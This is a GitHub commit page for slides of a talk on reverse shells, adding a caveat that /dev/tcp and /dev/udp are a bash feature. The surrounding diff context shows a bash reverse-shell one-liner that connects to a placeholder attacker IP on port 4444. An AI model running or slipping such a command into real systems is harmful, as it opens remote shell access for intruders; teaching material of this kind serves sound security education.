Skip to content

Commit

Permalink
Add caveat about /dev/{tcp,udp}
Browse files Browse the repository at this point in the history
  • Loading branch information
nodeselector committed Mar 8, 2024
1 parent a606b2f commit 21158df
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions talks/reverse-shells-for-fun-and-profit/slides.md
Original file line number Diff line number Diff line change
Expand Up @@ -64,6 +64,8 @@ bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1

Now we're living off the land and have zero dependencies! (outside of network egress)

> ! Note: /dev/{tcp,udp} is not a real file, it's a bash feature (non-POSIX). Other shells may not support this.
---

# Concerns
Expand Down

0 comments on commit 21158df

Please sign in to comment.